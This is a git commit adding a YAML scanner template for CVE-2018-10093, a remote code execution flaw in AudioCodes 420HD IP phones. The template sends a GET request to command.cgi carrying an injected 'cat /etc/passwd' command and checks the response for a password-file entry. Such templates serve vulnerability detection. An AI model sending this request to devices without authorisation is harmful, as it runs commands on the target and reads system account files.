Create CVE-2018-10093.yaml

patch-1
Wisnu Pramoedya 2021-10-18 19:44:09 +07:00 committed by GitHub
parent 3d6a079b42
commit 98d8a15123
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: CVE-2018-10093
info:
name: AudioCode 400HD - RCE
author: wisnupramoedya
severity: critical
description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution.
reference:
- https://www.exploit-db.com/exploits/46164
- https://nvd.nist.gov/vuln/detail/CVE-2018-10093
tags: cve,cve2018,rce,iot
requests:
- method: GET
path:
- "{{BaseURL}}/command.cgi?cat%20/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "admin:.*:"
- type: status
status:
- 200